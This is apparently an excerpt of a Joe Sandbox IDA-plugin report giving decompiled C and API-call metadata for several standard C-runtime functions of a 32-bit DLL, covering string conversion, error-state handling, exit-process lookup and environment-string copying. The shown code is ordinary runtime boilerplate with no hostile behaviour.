                                                                                        			E1000C7BB(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
                                                                                        				signed int _v8;
                                                                                        				int _v12;
                                                                                        				void* _v24;
                                                                                        				signed int _t49;
                                                                                        				signed int _t54;
                                                                                        				int _t58;
                                                                                        				signed int _t60;
                                                                                        				short* _t62;
                                                                                        				signed int _t66;
                                                                                        				short* _t70;
                                                                                        				int _t71;
                                                                                        				int _t78;
                                                                                        				short* _t81;
                                                                                        				signed int _t87;
                                                                                        				signed int _t90;
                                                                                        				void* _t95;
                                                                                        				void* _t96;
                                                                                        				int _t98;
                                                                                        				short* _t101;
                                                                                        				int _t103;
                                                                                        				signed int _t106;
                                                                                        				short* _t107;
                                                                                        				void* _t110;
                                                                                        
                                                                                        				_push(__ecx);
                                                                                        				_push(__ecx);
                                                                                        				_t49 =  *0x1001a004; // 0xcfb68a75
                                                                                        				_v8 = _t49 ^ _t106;
                                                                                        				_push(__esi);
                                                                                        				_t103 = _a20;
                                                                                        				if(_t103 > 0) {
                                                                                        					_t78 = E1000F41F(_a16, _t103);
                                                                                        					_t110 = _t78 - _t103;
                                                                                        					_t4 = _t78 + 1; // 0x1
                                                                                        					_t103 = _t4;
                                                                                        					if(_t110 >= 0) {
                                                                                        						_t103 = _t78;
                                                                                        					}
                                                                                        				}
                                                                                        				_t98 = _a32;
                                                                                        				if(_t98 == 0) {
                                                                                        					_t98 =  *( *_a4 + 8);
                                                                                        					_a32 = _t98;
                                                                                        				}
                                                                                        				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
                                                                                        				_v12 = _t54;
                                                                                        				if(_t54 == 0) {
                                                                                        					L38:
                                                                                        					return E1000296F(_v8 ^ _t106);
                                                                                        				} else {
                                                                                        					_t95 = _t54 + _t54;
                                                                                        					_t85 = _t95 + 8;
                                                                                        					asm("sbb eax, eax");
                                                                                        					if((_t95 + 0x00000008 & _t54) == 0) {
                                                                                        						_t81 = 0;
                                                                                        						__eflags = 0;
                                                                                        						L14:
                                                                                        						if(_t81 == 0) {
                                                                                        							L36:
                                                                                        							_t105 = 0;
                                                                                        							L37:
                                                                                        							E1000CA23(_t81);
                                                                                        							goto L38;
                                                                                        						}
                                                                                        						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
                                                                                        						_t121 = _t58;
                                                                                        						if(_t58 == 0) {
                                                                                        							goto L36;
                                                                                        						}
                                                                                        						_t100 = _v12;
                                                                                        						_t60 = E1000AD50(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
                                                                                        						_t105 = _t60;
                                                                                        						if(_t105 == 0) {
                                                                                        							goto L36;
                                                                                        						}
                                                                                        						if((_a12 & 0x00000400) == 0) {
                                                                                        							_t96 = _t105 + _t105;
                                                                                        							_t87 = _t96 + 8;
                                                                                        							__eflags = _t96 - _t87;
                                                                                        							asm("sbb eax, eax");
                                                                                        							__eflags = _t87 & _t60;
                                                                                        							if((_t87 & _t60) == 0) {
                                                                                        								_t101 = 0;
                                                                                        								__eflags = 0;
                                                                                        								L30:
                                                                                        								__eflags = _t101;
                                                                                        								if(__eflags == 0) {
                                                                                        									L35:
                                                                                        									E1000CA23(_t101);
                                                                                        									goto L36;
                                                                                        								}
                                                                                        								_t62 = E1000AD50(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
                                                                                        								__eflags = _t62;
                                                                                        								if(_t62 == 0) {
                                                                                        									goto L35;
                                                                                        								}
                                                                                        								_push(0);
                                                                                        								_push(0);
                                                                                        								__eflags = _a28;
                                                                                        								if(_a28 != 0) {
                                                                                        									_push(_a28);
                                                                                        									_push(_a24);
                                                                                        								} else {
                                                                                        									_push(0);
                                                                                        									_push(0);
                                                                                        								}
                                                                                        								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
                                                                                        								__eflags = _t105;
                                                                                        								if(_t105 != 0) {
                                                                                        									E1000CA23(_t101);
                                                                                        									goto L37;
                                                                                        								} else {
                                                                                        									goto L35;
                                                                                        								}
                                                                                        							}
                                                                                        							_t90 = _t96 + 8;
                                                                                        							__eflags = _t96 - _t90;
                                                                                        							asm("sbb eax, eax");
                                                                                        							_t66 = _t60 & _t90;
                                                                                        							_t87 = _t96 + 8;
                                                                                        							__eflags = _t66 - 0x400;
                                                                                        							if(_t66 > 0x400) {
                                                                                        								__eflags = _t96 - _t87;
                                                                                        								asm("sbb eax, eax");
                                                                                        								_t101 = E1000984B(_t87, _t66 & _t87);
                                                                                        								_pop(_t87);
                                                                                        								__eflags = _t101;
                                                                                        								if(_t101 == 0) {
                                                                                        									goto L35;
                                                                                        								}
                                                                                        								 *_t101 = 0xdddd;
                                                                                        								L28:
                                                                                        								_t101 =  &(_t101[4]);
                                                                                        								goto L30;
                                                                                        							}
                                                                                        							__eflags = _t96 - _t87;
                                                                                        							asm("sbb eax, eax");
                                                                                        							E10012650();
                                                                                        							_t101 = _t107;
                                                                                        							__eflags = _t101;
                                                                                        							if(_t101 == 0) {
                                                                                        								goto L35;
                                                                                        							}
                                                                                        							 *_t101 = 0xcccc;
                                                                                        							goto L28;
                                                                                        						}
                                                                                        						_t70 = _a28;
                                                                                        						if(_t70 == 0) {
                                                                                        							goto L37;
                                                                                        						}
                                                                                        						_t125 = _t105 - _t70;
                                                                                        						if(_t105 > _t70) {
                                                                                        							goto L36;
                                                                                        						}
                                                                                        						_t71 = E1000AD50(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
                                                                                        						_t105 = _t71;
                                                                                        						if(_t71 != 0) {
                                                                                        							goto L37;
                                                                                        						}
                                                                                        						goto L36;
                                                                                        					}
                                                                                        					asm("sbb eax, eax");
                                                                                        					_t72 = _t54 & _t95 + 0x00000008;
                                                                                        					_t85 = _t95 + 8;
                                                                                        					if((_t54 & _t95 + 0x00000008) > 0x400) {
                                                                                        						__eflags = _t95 - _t85;
                                                                                        						asm("sbb eax, eax");
                                                                                        						_t81 = E1000984B(_t85, _t72 & _t85);
                                                                                        						_pop(_t85);
                                                                                        						__eflags = _t81;
                                                                                        						if(__eflags == 0) {
                                                                                        							goto L36;
                                                                                        						}
                                                                                        						 *_t81 = 0xdddd;
                                                                                        						L12:
                                                                                        						_t81 =  &(_t81[4]);
                                                                                        						goto L14;
                                                                                        					}
                                                                                        					asm("sbb eax, eax");
                                                                                        					E10012650();
                                                                                        					_t81 = _t107;
                                                                                        					if(_t81 == 0) {
                                                                                        						goto L36;
                                                                                        					}
                                                                                        					 *_t81 = 0xcccc;
                                                                                        					goto L12;
                                                                                        				}
                                                                                        			}


























                                                                                        0x1000c7c0
                                                                                        0x1000c7c1
                                                                                        0x1000c7c2
                                                                                        0x1000c7c9
                                                                                        0x1000c7cd
                                                                                        0x1000c7ce
                                                                                        0x1000c7d4
                                                                                        0x1000c7da
                                                                                        0x1000c7e0
                                                                                        0x1000c7e3
                                                                                        0x1000c7e3
                                                                                        0x1000c7e6
                                                                                        0x1000c7e8
                                                                                        0x1000c7e8
                                                                                        0x1000c7e6
                                                                                        0x1000c7ea
                                                                                        0x1000c7ef
                                                                                        0x1000c7f6
                                                                                        0x1000c7f9
                                                                                        0x1000c7f9
                                                                                        0x1000c815
                                                                                        0x1000c81b
                                                                                        0x1000c820
                                                                                        0x1000c9b3
                                                                                        0x1000c9c6
                                                                                        0x1000c826
                                                                                        0x1000c826
                                                                                        0x1000c829
                                                                                        0x1000c82e
                                                                                        0x1000c832
                                                                                        0x1000c886
                                                                                        0x1000c886
                                                                                        0x1000c888
                                                                                        0x1000c88a
                                                                                        0x1000c9a8
                                                                                        0x1000c9a8
                                                                                        0x1000c9aa
                                                                                        0x1000c9ab
                                                                                        0x00000000
                                                                                        0x1000c9b1
                                                                                        0x1000c89b
                                                                                        0x1000c8a1
                                                                                        0x1000c8a3
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000c8a9
                                                                                        0x1000c8bb
                                                                                        0x1000c8c0
                                                                                        0x1000c8c4
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000c8d1
                                                                                        0x1000c90b
                                                                                        0x1000c90e
                                                                                        0x1000c911
                                                                                        0x1000c913
                                                                                        0x1000c915
                                                                                        0x1000c917
                                                                                        0x1000c963
                                                                                        0x1000c963
                                                                                        0x1000c965
                                                                                        0x1000c965
                                                                                        0x1000c967
                                                                                        0x1000c9a1
                                                                                        0x1000c9a2
                                                                                        0x00000000
                                                                                        0x1000c9a7
                                                                                        0x1000c97b
                                                                                        0x1000c980
                                                                                        0x1000c982
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000c986
                                                                                        0x1000c987
                                                                                        0x1000c988
                                                                                        0x1000c98b
                                                                                        0x1000c9c7
                                                                                        0x1000c9ca
                                                                                        0x1000c98d
                                                                                        0x1000c98d
                                                                                        0x1000c98e
                                                                                        0x1000c98e
                                                                                        0x1000c99b
                                                                                        0x1000c99d
                                                                                        0x1000c99f
                                                                                        0x1000c9d0
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000c99f
                                                                                        0x1000c919
                                                                                        0x1000c91c
                                                                                        0x1000c91e
                                                                                        0x1000c920
                                                                                        0x1000c922
                                                                                        0x1000c925
                                                                                        0x1000c92a
                                                                                        0x1000c945
                                                                                        0x1000c947
                                                                                        0x1000c951
                                                                                        0x1000c953
                                                                                        0x1000c954
                                                                                        0x1000c956
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000c958
                                                                                        0x1000c95e
                                                                                        0x1000c95e
                                                                                        0x00000000
                                                                                        0x1000c95e
                                                                                        0x1000c92c
                                                                                        0x1000c92e
                                                                                        0x1000c932
                                                                                        0x1000c937
                                                                                        0x1000c939
                                                                                        0x1000c93b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000c93d
                                                                                        0x00000000
                                                                                        0x1000c93d
                                                                                        0x1000c8d3
                                                                                        0x1000c8d8
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000c8de
                                                                                        0x1000c8e0
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000c8f7
                                                                                        0x1000c8fc
                                                                                        0x1000c900
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000c906
                                                                                        0x1000c839
                                                                                        0x1000c83b
                                                                                        0x1000c83d
                                                                                        0x1000c845
                                                                                        0x1000c864
                                                                                        0x1000c866
                                                                                        0x1000c870
                                                                                        0x1000c872
                                                                                        0x1000c873
                                                                                        0x1000c875
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000c87b
                                                                                        0x1000c881
                                                                                        0x1000c881
                                                                                        0x00000000
                                                                                        0x1000c881
                                                                                        0x1000c849
                                                                                        0x1000c84d
                                                                                        0x1000c852
                                                                                        0x1000c856
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000c85c
                                                                                        0x00000000
                                                                                        0x1000c85c

                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,00000001,1000742A,1000742A,?,?,?,1000CA0C,00000001,00000001,CCE85006), ref: 1000C815
                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,1000CA0C,00000001,00000001,CCE85006,?,?,?), ref: 1000C89B
                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,CCE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 1000C995
                                                                                        • __freea.LIBCMT ref: 1000C9A2
                                                                                          • Part of subcall function 1000984B: HeapAlloc.KERNEL32(00000000,10002953,?,?,10003B25,?,?,00000000,00000000,?,100028A6,10002953,?,?,?,?), ref: 1000987D
                                                                                        • __freea.LIBCMT ref: 1000C9AB
                                                                                        • __freea.LIBCMT ref: 1000C9D0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.661084660.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                        • Associated: 00000000.00000003.373928207.000000001001D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661074193.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661103501.0000000010013000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661115201.000000001001A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661124775.000000001001C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_10000000______NCM______2_10042231.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide__freea$AllocHeap
                                                                                        • String ID:
                                                                                        • API String ID: 3147120248-0
                                                                                        • Opcode ID: de97c62eb96a90ca5be398d237a7d61bac95f6f1944e94aaf27609673995329c
                                                                                        • Instruction ID: f07ff367d9fa0908b7ec283608bbacc303f45f9efaff5604eacc51112f965d32
                                                                                        • Opcode Fuzzy Hash: de97c62eb96a90ca5be398d237a7d61bac95f6f1944e94aaf27609673995329c
                                                                                        • Instruction Fuzzy Hash: 3051AD7261031AAFFB15CF64CC85EAE77E9EB857D0F114229FD04E6198EB34EC408691
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 79%
                                                                                        			E1000400A(void* __ecx) {
                                                                                        				void* _t4;
                                                                                        				void* _t11;
                                                                                        				void* _t16;
                                                                                        				long _t25;
                                                                                        				void* _t28;
                                                                                        
                                                                                        				if( *0x1001a020 != 0xffffffff) {
                                                                                        					_t25 = GetLastError();
                                                                                        					_t11 = E10005228(__eflags,  *0x1001a020);
                                                                                        					__eflags = _t11 - 0xffffffff;
                                                                                        					if(_t11 == 0xffffffff) {
                                                                                        						L5:
                                                                                        						_t11 = 0;
                                                                                        					} else {
                                                                                        						__eflags = _t11;
                                                                                        						if(__eflags == 0) {
                                                                                        							_t4 = E10005263(__eflags,  *0x1001a020, 0xffffffff);
                                                                                        							_pop(_t16);
                                                                                        							__eflags = _t4;
                                                                                        							if(_t4 != 0) {
                                                                                        								_push(0x28);
                                                                                        								_push(1);
                                                                                        								_t28 = E1000881D(_t16);
                                                                                        								__eflags = _t28;
                                                                                        								if(__eflags == 0) {
                                                                                        									L8:
                                                                                        									_t11 = 0;
                                                                                        									E10005263(__eflags,  *0x1001a020, 0);
                                                                                        								} else {
                                                                                        									__eflags = E10005263(__eflags,  *0x1001a020, _t28);
                                                                                        									if(__eflags != 0) {
                                                                                        										_t11 = _t28;
                                                                                        										_t28 = 0;
                                                                                        										__eflags = 0;
                                                                                        									} else {
                                                                                        										goto L8;
                                                                                        									}
                                                                                        								}
                                                                                        								L10007B23(_t28);
                                                                                        							} else {
                                                                                        								goto L5;
                                                                                        							}
                                                                                        						}
                                                                                        					}
                                                                                        					SetLastError(_t25);
                                                                                        					return _t11;
                                                                                        				} else {
                                                                                        					return 0;
                                                                                        				}
                                                                                        			}








                                                                                        0x10004011
                                                                                        0x10004024
                                                                                        0x1000402b
                                                                                        0x1000402e
                                                                                        0x10004031
                                                                                        0x1000404a
                                                                                        0x1000404a
                                                                                        0x10004033
                                                                                        0x10004033
                                                                                        0x10004035
                                                                                        0x1000403f
                                                                                        0x10004045
                                                                                        0x10004046
                                                                                        0x10004048
                                                                                        0x1000404f
                                                                                        0x10004051
                                                                                        0x10004058
                                                                                        0x1000405c
                                                                                        0x1000405e
                                                                                        0x10004072
                                                                                        0x10004072
                                                                                        0x1000407b
                                                                                        0x10004060
                                                                                        0x1000406e
                                                                                        0x10004070
                                                                                        0x10004084
                                                                                        0x10004086
                                                                                        0x10004086
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10004070
                                                                                        0x10004089
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10004048
                                                                                        0x10004035
                                                                                        0x10004091
                                                                                        0x1000409b
                                                                                        0x10004013
                                                                                        0x10004015
                                                                                        0x10004015

                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(00000001,?,10003E14,1000304C,100029F7,?,10002C14,?,00000001,?,?,00000001,?,10019250,0000000C,10002D08), ref: 10004018
                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10004026
                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000403F
                                                                                        • SetLastError.KERNEL32(00000000,10002C14,?,00000001,?,?,00000001,?,10019250,0000000C,10002D08,?,00000001,?), ref: 10004091
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.661084660.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                        • Associated: 00000000.00000003.373928207.000000001001D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661074193.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661103501.0000000010013000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661115201.000000001001A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661124775.000000001001C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_10000000______NCM______2_10042231.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                        • String ID:
                                                                                        • API String ID: 3852720340-0
                                                                                        • Opcode ID: d5d60b6209603077362123c2fc5dded152e988e55ccaca2ab2e693a66909b9c6
                                                                                        • Instruction ID: e0ace56ed691264aafe1d3735cb025628c8a176692e367ffa08f457b7a4a194b
                                                                                        • Opcode Fuzzy Hash: d5d60b6209603077362123c2fc5dded152e988e55ccaca2ab2e693a66909b9c6
                                                                                        • Instruction Fuzzy Hash: F101D8B69093225EF215DA746CC970B37D9EB0A7F1722422AF720620F9EF329C415288
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 72%
                                                                                        			E10009420(void* __ebx, void* __ecx, void* __edx) {
                                                                                        				void* __edi;
                                                                                        				void* __esi;
                                                                                        				intOrPtr _t2;
                                                                                        				void* _t3;
                                                                                        				void* _t4;
                                                                                        				intOrPtr _t9;
                                                                                        				void* _t11;
                                                                                        				void* _t20;
                                                                                        				void* _t21;
                                                                                        				void* _t23;
                                                                                        				void* _t25;
                                                                                        				void* _t27;
                                                                                        				void* _t29;
                                                                                        				void* _t31;
                                                                                        				void* _t32;
                                                                                        				long _t36;
                                                                                        				long _t37;
                                                                                        				void* _t40;
                                                                                        
                                                                                        				_t29 = __edx;
                                                                                        				_t23 = __ecx;
                                                                                        				_t20 = __ebx;
                                                                                        				_t36 = GetLastError();
                                                                                        				_t2 =  *0x1001a050; // 0xffffffff
                                                                                        				_t42 = _t2 - 0xffffffff;
                                                                                        				if(_t2 == 0xffffffff) {
                                                                                        					L2:
                                                                                        					_t3 = E1000AF17(_t23, 1, 0x364);
                                                                                        					_t31 = _t3;
                                                                                        					_pop(_t25);
                                                                                        					if(_t31 != 0) {
                                                                                        						_t4 = E1000AC95(_t25, _t36, __eflags,  *0x1001a050, _t31);
                                                                                        						__eflags = _t4;
                                                                                        						if(_t4 != 0) {
                                                                                        							E10009266(_t25, _t31, 0x1001adb8);
                                                                                        							E10009811(0);
                                                                                        							_t40 = _t40 + 0xc;
                                                                                        							__eflags = _t31;
                                                                                        							if(_t31 == 0) {
                                                                                        								goto L9;
                                                                                        							} else {
                                                                                        								goto L8;
                                                                                        							}
                                                                                        						} else {
                                                                                        							_push(_t31);
                                                                                        							goto L4;
                                                                                        						}
                                                                                        					} else {
                                                                                        						_push(_t3);
                                                                                        						L4:
                                                                                        						E10009811();
                                                                                        						_pop(_t25);
                                                                                        						L9:
                                                                                        						SetLastError(_t36);
                                                                                        						E100087DA(_t20, _t29, _t31, _t36);
                                                                                        						asm("int3");
                                                                                        						_push(_t20);
                                                                                        						_push(_t36);
                                                                                        						_push(_t31);
                                                                                        						_t37 = GetLastError();
                                                                                        						_t21 = 0;
                                                                                        						_t9 =  *0x1001a050; // 0xffffffff
                                                                                        						_t45 = _t9 - 0xffffffff;
                                                                                        						if(_t9 == 0xffffffff) {
                                                                                        							L12:
                                                                                        							_t32 = E1000AF17(_t25, 1, 0x364);
                                                                                        							_pop(_t27);
                                                                                        							if(_t32 != 0) {
                                                                                        								_t11 = E1000AC95(_t27, _t37, __eflags,  *0x1001a050, _t32);
                                                                                        								__eflags = _t11;
                                                                                        								if(_t11 != 0) {
                                                                                        									E10009266(_t27, _t32, 0x1001adb8);
                                                                                        									E10009811(_t21);
                                                                                        									__eflags = _t32;
                                                                                        									if(_t32 != 0) {
                                                                                        										goto L19;
                                                                                        									} else {
                                                                                        										goto L18;
                                                                                        									}
                                                                                        								} else {
                                                                                        									_push(_t32);
                                                                                        									goto L14;
                                                                                        								}
                                                                                        							} else {
                                                                                        								_push(_t21);
                                                                                        								L14:
                                                                                        								E10009811();
                                                                                        								L18:
                                                                                        								SetLastError(_t37);
                                                                                        							}
                                                                                        						} else {
                                                                                        							_t32 = E1000AC3F(_t25, _t37, _t45, _t9);
                                                                                        							if(_t32 != 0) {
                                                                                        								L19:
                                                                                        								SetLastError(_t37);
                                                                                        								_t21 = _t32;
                                                                                        							} else {
                                                                                        								goto L12;
                                                                                        							}
                                                                                        						}
                                                                                        						return _t21;
                                                                                        					}
                                                                                        				} else {
                                                                                        					_t31 = E1000AC3F(_t23, _t36, _t42, _t2);
                                                                                        					if(_t31 != 0) {
                                                                                        						L8:
                                                                                        						SetLastError(_t36);
                                                                                        						return _t31;
                                                                                        					} else {
                                                                                        						goto L2;
                                                                                        					}
                                                                                        				}
                                                                                        			}





















                                                                                        0x10009420
                                                                                        0x10009420
                                                                                        0x10009420
                                                                                        0x1000942a
                                                                                        0x1000942c
                                                                                        0x10009431
                                                                                        0x10009434
                                                                                        0x10009442
                                                                                        0x10009449
                                                                                        0x1000944e
                                                                                        0x10009451
                                                                                        0x10009454
                                                                                        0x10009466
                                                                                        0x1000946b
                                                                                        0x1000946d
                                                                                        0x10009478
                                                                                        0x1000947f
                                                                                        0x10009484
                                                                                        0x10009487
                                                                                        0x10009489
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000946f
                                                                                        0x1000946f
                                                                                        0x00000000
                                                                                        0x1000946f
                                                                                        0x10009456
                                                                                        0x10009456
                                                                                        0x10009457
                                                                                        0x10009457
                                                                                        0x1000945c
                                                                                        0x10009497
                                                                                        0x10009498
                                                                                        0x1000949e
                                                                                        0x100094a3
                                                                                        0x100094a6
                                                                                        0x100094a7
                                                                                        0x100094a8
                                                                                        0x100094af
                                                                                        0x100094b1
                                                                                        0x100094b3
                                                                                        0x100094b8
                                                                                        0x100094bb
                                                                                        0x100094c9
                                                                                        0x100094d5
                                                                                        0x100094d8
                                                                                        0x100094db
                                                                                        0x100094ed
                                                                                        0x100094f2
                                                                                        0x100094f4
                                                                                        0x100094ff
                                                                                        0x10009505
                                                                                        0x1000950d
                                                                                        0x1000950f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x100094f6
                                                                                        0x100094f6
                                                                                        0x00000000
                                                                                        0x100094f6
                                                                                        0x100094dd
                                                                                        0x100094dd
                                                                                        0x100094de
                                                                                        0x100094de
                                                                                        0x10009511
                                                                                        0x10009512
                                                                                        0x10009512
                                                                                        0x100094bd
                                                                                        0x100094c3
                                                                                        0x100094c7
                                                                                        0x1000951a
                                                                                        0x1000951b
                                                                                        0x10009521
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x100094c7
                                                                                        0x10009528
                                                                                        0x10009528
                                                                                        0x10009436
                                                                                        0x1000943c
                                                                                        0x10009440
                                                                                        0x1000948b
                                                                                        0x1000948c
                                                                                        0x10009496
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10009440

                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(?,00000000,10006975,00000000,00000000,?,10006514,00000001,00000000,00000000,00000000), ref: 10009424
                                                                                        • _free.LIBCMT ref: 10009457
                                                                                        • _free.LIBCMT ref: 1000947F
                                                                                        • SetLastError.KERNEL32(00000000,00000000,00000000,00000000), ref: 1000948C
                                                                                        • SetLastError.KERNEL32(00000000,00000000,00000000,00000000), ref: 10009498
                                                                                        • _abort.LIBCMT ref: 1000949E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.661084660.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                        • Associated: 00000000.00000003.373928207.000000001001D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661074193.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661103501.0000000010013000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661115201.000000001001A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661124775.000000001001C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_10000000______NCM______2_10042231.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$_free$_abort
                                                                                        • String ID:
                                                                                        • API String ID: 3160817290-0
                                                                                        • Opcode ID: 2aca735f75b6efdd626cc804714beadc387f5819abb22dd04423edf0726697b3
                                                                                        • Instruction ID: 019e09ec9cb49999c4106e4e0afeda14c61c4bcac213b601e4aeee0c8744ca70
                                                                                        • Opcode Fuzzy Hash: 2aca735f75b6efdd626cc804714beadc387f5819abb22dd04423edf0726697b3
                                                                                        • Instruction Fuzzy Hash: A2F0817A5046116BF203D6785C4AF5F2699DBC26E1F22C524F9589619DEE30D9434221
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10007E1D,00000000,?,10007DBD,00000000,10019428,0000000C,10007F05,00000000,00000002), ref: 10007E8C
                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10007E9F
                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,10007E1D,00000000,?,10007DBD,00000000,10019428,0000000C,10007F05,00000000,00000002), ref: 10007EC2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.661084660.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                        • Associated: 00000000.00000003.373928207.000000001001D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661074193.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661103501.0000000010013000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661115201.000000001001A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661124775.000000001001C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_10000000______NCM______2_10042231.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                        • API String ID: 4061214504-1276376045
                                                                                        • Opcode ID: ddab9b39c7b67d91292fa42a736d346d9780fefed1be21044bc09efa1a97ce03
                                                                                        • Instruction ID: e38a9306c284b75481ac6ea112517839cce17df32a5e963fc5897363555ced8c
                                                                                        • Opcode Fuzzy Hash: ddab9b39c7b67d91292fa42a736d346d9780fefed1be21044bc09efa1a97ce03
                                                                                        • Instruction Fuzzy Hash: 18F04431D01118BBEB01DBA0CC48B9EBFF5EB08791F008194F909A6150CB34DE84CB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 93%
                                                                                        			E1000BCEF() {
                                                                                        				int _v8;
                                                                                        				void* __ecx;
                                                                                        				void* _t6;
                                                                                        				int _t7;
                                                                                        				char* _t13;
                                                                                        				int _t17;
                                                                                        				void* _t19;
                                                                                        				char* _t25;
                                                                                        				WCHAR* _t27;
                                                                                        
                                                                                        				_t27 = GetEnvironmentStringsW();
                                                                                        				if(_t27 == 0) {
                                                                                        					L7:
                                                                                        					_t13 = 0;
                                                                                        				} else {
                                                                                        					_t6 = E1000BCB8(_t27);
                                                                                        					_pop(_t19);
                                                                                        					_t17 = _t6 - _t27 >> 1;
                                                                                        					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
                                                                                        					_v8 = _t7;
                                                                                        					if(_t7 == 0) {
                                                                                        						goto L7;
                                                                                        					} else {
                                                                                        						_t25 = E1000984B(_t19, _t7);
                                                                                        						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
                                                                                        							_t13 = 0;
                                                                                        						} else {
                                                                                        							_t13 = _t25;
